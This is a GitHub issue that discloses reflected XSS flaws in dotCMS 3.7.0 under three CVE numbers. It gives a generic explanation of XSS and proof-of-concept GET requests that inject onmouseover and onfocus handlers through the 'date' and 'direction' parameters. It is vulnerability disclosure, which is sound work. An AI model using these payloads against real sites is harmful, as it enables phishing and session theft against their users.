Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple XSS in dotCMS - 3.7.0 #10643

Belladona-c0re opened this issue Feb 6, 2017 · 0 comments


None yet
1 participant
Copy link

commented Feb 6, 2017

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202


XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1

XSS CVE-2017-5877 :

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500


How to fix:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.